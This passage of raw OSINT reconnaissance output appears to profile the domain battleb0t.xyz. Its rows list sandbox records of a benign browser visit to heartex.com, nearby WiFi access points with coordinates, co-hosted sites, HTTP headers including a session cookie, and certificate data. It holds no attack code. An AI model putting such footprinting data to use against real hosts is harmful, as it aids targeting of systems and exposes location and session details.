[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\D2A4F93EC4F5B9C4C799775424B5AD98]- [targetUID: 00000000-00002536]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003376]\n "RecoveryStore._D69E16F7-2DF2-11ED-B0FF-080027103F92_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002536]\n "~DFA0927F58997C2571.TMP" has type "data"- Location: [%TEMP%\\~DFA0927F58997C2571.TMP]- [targetUID: 00000000-00003376]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002536]\n "_E196A91A-2DF2-11ED-B0FF-080027103F92_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "MYFHZ4TT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MYFHZ4TT.txt]- [targetUID: 00000000-00002536]\n "CabCC01.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"- Location: [%TEMP%\\CabCC01.tmp]- [targetUID: 00000000-00002536]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'API Call', u'identifier': u'api-113', u'name': u'Touches files in program files directory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\iexplore.exe.config"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\VERSION.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\CRYPTBASE.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEFRAME.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE.LOCAL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\FLTLIB.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\SSPICLI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEShims.dll"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\SECUR32.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IPHLPAPI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\WINNSI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\CRYPTSP.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\RPCRTREMOTE.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\DWMAPI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\MSHTML.DLL"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.automox.com"- [Source: SSL_34.74.170.74]\n\n "HTTP/1.1 304 Not Modified\nAccept-Ranges: bytes\nAge: 3368\nCache-Control: max-age=3600\nDate: Tue, 06 Sep 2022 16:48:09 GMT\nEtag: 0x8D8BDBB0003E830\nLast-Modified: Thu, 21 Jan 2021 03:16:52 GMT\nServer: ECAcc (saa/838B)\nX-Cache: HIT\nx-ms-blob-type: BlockBlob\nx-ms-lease-status: unlocked\nx-ms-request-id: 0b6a3ee4-101e-00d0-6408-c251a0000000\nx-ms-version: 2009-09-19"- [Source: SSL_34.74.170.74]\n\n "HTTP/1.1 302 Moved Temporarily\nContent-Length: 0\nServer: Kestrel\nLocation: https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us\nRequest-Context: appId=cid-v1:b47e5e27-bf85-45ba-a97c-0377ce0e5779\nX-Response-Cache-Status: True\nExpires: Tue, 06 Sep 2022 16:48:44 GMT\nCache-Control: max-age=0, no-cache, no-store\nPragma: no-cache\nDate: Tue, 06 Sep 2022 16:48:44 GMT\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains"- [Source: SSL_184.50.50.164]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "h | 34.74.170.74 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:01:E6:93:CF:EC) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:35 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Google Analytics | fluid.battleb0t.xyz |
| 2023-05-12 02:57:24 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | tiktok.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:47:12 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://heartex.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f9c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_f9c_ConnHashTable<3996>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_f9c_IESQMMUTEX_0_519"\n "IsoScope_f9c_IESQMMUTEX_0_331"\n "IsoScope_f9c_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3996"\n "IsoScope_f9c_IE_EarlyTabStart_0xea8_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"analytics.twitter.com"\n "heartex.com"\n "js.hsadspixel.net"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"13.227.74.56:80"\n "13.227.74.56:443"\n "142.250.189.202:443"\n "13.227.74.90:443"\n "104.17.186.73:443"\n "13.227.21.217:443"\n "185.199.111.153:443"\n "172.217.164.106:443"\n "142.250.191.67:443"\n "142.250.189.168:443"\n "142.250.189.174:443"\n "104.17.214.204:443"\n "13.227.74.89:443"\n "23.55.103.51:443"\n "151.101.24.157:443"\n "104.17.112.176:443"\n "172.64.154.85:443"\n "104.17.130.171:443"\n "104.17.69.176:443"\n "13.227.74.66:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"heartex.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"6102a46ccec85d017bcc2ea4_ek_team-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6103d15f93e9fa6c012c8905_ek_check-icon-light_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "61027ead2e82974a47ffe5fc_ek_green-right-arrow_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "62845fcc117dd7a6fe0a0330_right-yellow-arrow_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6102a13ad6dfa169537a8465_ek_check-icon-yellow_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6101e8714894dbfc5bef0fa5_Logo%20_1_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "webflow-badge-text.6faa6a38cd_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6102a13f33808950ccb6b0a7_ek_check-icon-dark_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "610406eb48709a315b97318b_ek_distribution-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6102a55d9e941b7adf11922c_ek_diagram-second-bg_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6102a5695227bc2dfbc40fcc_ek_diagram-first-bg_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "610406eb48709a7de897318a_ek_stats-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6102a46ca6246aa43f715335_ek_source-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6102a46c77137f94f59ea443_ek_person-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6102a46c151a70571e8e0d8a_ek_diagram-sources-logos_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "634e0a11af42084e411d009e_62ebcfe5d1d25479db4287d3_yext%201_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "webflow-badge-icon.f67cd735e3_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "61027e702e82970a07ffe572_Vector_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlref_httpheartex.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"analytics.twitter.com" (Indicator: "twitter")\n "GET /uwt.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://heartex.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: static.ads-twitter.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "twitter")\n "HTTP/1.1 200 OK\ndate: Fri, 03 Mar 2023 20:33:38 GMT\nperf: 7626143928\nserver: tsa_p\nset-cookie: personalization_id="v1_b2bnC1YShnqqYcU8imaaVg=="; Max-Age=63072000; Expires=Sun, 02 Mar 2025 20:33:38 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None\ncontent-type: text/html;charset=utf-8\ncache-control: no-cache, no-store, max-age=0\ncontent-length: 0\nx-transaction-id: f947248016427219\nx-xss-protection: 0\nstrict-transport-security: max-age=631138519\naccess-control-allow-credentials: true\nx-response-time: 6\nx-connection-hash: 6a22b51b9194de2aeabd35b4c00e43e07f8e10848fa5ea2f38546b537c37a204" (Indicator: "twitter")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: heartex.com"\n "HTTP/1.1 200 OK\nContent-Type: text/html\nContent-Length: 11658\nConnection: keep-alive\nDate: Fri, 03 Mar 2023 20:33:29 GMT\nx-amzn-RequestId: 9caa9f24-d37e-4bdc-a944-8bf45e2c7515\nX-Cache-Hits: 1\nContent-Encoding: gzip\nx-amzn-Remapped-Content-Length: 11658\nContent-Security-Policy: frame-ancestors \'self\' https://*.webflow.com http://*.webflow.com http://*.webflow.io http://webflow.com https://webflow.com\nx-amzn-Remapped-Connection: keep-alive\nX-Timer: S1677875610.649584,VS0,VE1\nx-amz-apigw-id: BOLwDF0QoAMFkYQ=\nVary: x-wf-forwarded-proto, Accept-Encoding\nX-Served-By: cache-iad-kjyo7100030-IAD\nAccept-Ranges: bytes\nx-amzn-Remapped-Date: Fri, 03 Mar 2023 20:33:29 GMT\nX-Cache: Miss from cloudfront\nVia: 1.1 3d33f952c2b7fe5b0308385e96c9263c.cloudfront.net (CloudFront)\nX-Amz-Cf-Pop: SFO20-C1\nX-Amz-Cf-Id: lTokqI3fqL10sQQ4g0f5g2nhevRA_cQ0eLSc4ldBFY0F5O7pdLFEQw==\nAge: 749\n\n}KF+MJrZV[r: !\nq3y1\n;\' GiTe;f,$\'Og_c1&Xx&L{(H+/v>>ja\'A4\nT%WD\n:O@f: hz\\)d%q`vgY#k39Tn{AV=x`q]etUgx T\n&r:<i\nsQ28?QH&k,,f\n2xjMXfaL#KMxO7iHIcuycUrc/4dS91PNfxt:$Kkb:8><&<U 4UQjTN@@~DM5~"QjJZ<<b\nsQ=TYe*e+uDr& hcK:Ldrz\nzM9ex8P\n.iErlNTv>iho o(Q!VfS)-Fc6x$~6ej93hLiWD4x#$eFClNa!&fO5K(:UW1$x7\n?4N!In9x"C_"y4wqMnntN7/_z7T!S\n}?`8wBhz|"hH|U{:I]Vj3+$3=Jpw_s*\n8OI7Xq<BG IGi5ofHWQ5)ZA8$Lo?@U=+%rrV#GG5~P?`DSoq>6.*E?<X~pML;l~JxjMVAL9i["q4+=Ffce1."3AcE!KJaL1;9N\n.i}\\;j1o{1I:ac2LsIb_]bX*!&:Hj}]XP%L^w?h|t7\n^L\n+A\\yD4H(0G^aN?jCa|`-7Y~WwznS|rwxX\'3X\'c Jgcyq$J|MHivO|w("P!V"{yA5Q6{7Iz\'!\n7Qb>\n|\'[GbAb9nvtZu2[L6a\n+\\\n#tf|DwdOpB$-_4|*~Dx\n<&!BzdZb<bqdF|4w[,.4"S%89Q|\'2Ky4\n;)`)<f3fsa;Jb.H93<R!YcJ2nc/.y\'SB`FP2Nx0.(y`N{5%rt$#L8"6r?pnxt3BA8zqp!XsAtIm_x*,nKlYh\n3(&~b3($:,{5|KFN$+F}}{MO0mu[vGuvTr)1m\\k?DTlANOUT`G\ndlw}{A0:Zn^e#a$A S=5FI7%Rogfl>7bH:\'OT&VM)9}\\-5T`t7>{_#Zz3|2&1UY?5O(/.%{yA8Vp`NG%kk")bp^={wbbA}e]/<{\n;N7p7\n@Ml<Ha>aJ7CypWn]e;~-\n4\n8%Xj}Y}\\}3uO^^+ Tt*f#1@ncY[5l[vtm3X]gna;S}jCx\n2Ex-\nAj\\8.Nl[\n(D{$FQ=!#"FmY37<Jp)D=ujraduk\'_*F-)\n0iW9MU\\yhoHiH=ek N4nK:A 3SlLiFg?m)j/=QAls)gp!aYbMn&4f%}@+4MCv/`I>lD1 xTaM\n`Jb=/,<\nMr>1Wsmbc&-\n+Dz2aF[SyZ]L|AW\\-8i,dZ\no;g@dx:}X iKsSj\ny,y!hI)8|`+`9mtzVm+MF<2@:^%[\\C\n-S^Fc,CBFmjrV6QzKnfP9}Y}3o\n(SF$mr7=^lMhS5u/I\nh"m $\'N+)Z^HNdv}tU)+$t/Sro 6JC4i)V4kexSb\\4t&n2\n^Sik&g&.&t>:AX\nX}7/qjCP:@z9\\UHD&^V\n X|\ndEyAmnh6`.VW+ZwlX\nv`{~Fl$>@q7.\nsbfI@TUmbIx5=x/F-%5IK <ydI \'5!$3F! | 185.199.111.153 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00088.github.io | 185.199.111.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | 1136 4120 (Net ID: 00:0F:CC:76:66:44) | 32.8608, -79.9746 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 03:37:16 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | Northbrook, United States | 165.232.113.85 |
| 2023-05-12 02:44:18 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | funny.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'MIIFKjCCBBKgAwIBAgISA5eZXGCsQGj4st4KZ3rat9EWMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzAyNTNaFw0yMzA1MjUwMzAyNTJaMB4xHDAaBgNVBAMTE2ZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtvNBxdfnBUXlJ+CVs4kt6BeErbHlEmP+yzLzX2iclKTfHuoDL4Xy4TTeivJNE67xi/0fLIeo9BUwEV4KTW6klKfuYM7AEdKq8mmRex+Js5ewq50Br4XWTObPPuOkRKebRnghWVBafwR0f9fbKSDqUUwMdv1KvbiedgI3wVyjU8AE09DlZSt+fAEeHmjk4wY+EigILsm5cNqL2NebSI2spsRWqhqNb6zDMr7jf1Q6Pjil+DSEo0NJMcVsZAZvcuZCIffxdPnJE5kYR3eb9pUKjByTnKdkpHPNyd4vLC99FNAuBqADe8BN0G78vYa1lcyk+BbXDkCiMlu/Lswa6m2v3AgMBAAGjggJMMIICSDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFMSFgqNe7U1U6Q29Aqxnsvrz4Vg/MB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE2ZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggECBgorBgEEAdZ5AgQCBIHzBIHwAO4AdQC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBlpBHAAAEAwBGMEQCICjxcLLm9aGcwyq5mLfK3kYGig39XVFiap6vpxj4VtGwAiAhpNN7m5SlM1cl6vnpa33bPptwrJlHu2Ch2NSf4J/0RAB1AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhoGWkIMAAAQDAEYwRAIgPen/cKNLJEXeMs3B69ZoUOiQORdwZS/DjifvjwosEkICIGO9t4hTEa50wIw+3Zov1uU0pIyiq0OMZH6b0o6QCM5gMA0GCSqGSIb3DQEBCwUAA4IBAQB+MVu1xgwWJwv1GrOAp+9eXxuHOLeKvlxLKj8oK0+HX8K007e++Cj1FcezPz1AtAOklQYBGlgfdTZL7GVa4P2wv0Hj/1dO3QVHLOV0yFpYGdZTYfaNDhkpXd2yE+jFTH5o3PK0BVoTjtIuTl6BEKWGjzAw92FKb1wXDaTvEwIFSLAYrJzfJHAS40SsMVT1tpL07LbnFpMjx7h+UVz3BTMcDnqzPe0hA9K8pb8QgR9MedQ6c7mTn1eLmOo+dDlwmT06wPJN4VXt3ElOpjmlguotbukXxnJ17BBy0Mk+uTBpvC9wBjy6MbbBDEXmkoh4VjrUDNIyuEk388RtFWlUmQrZ', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': 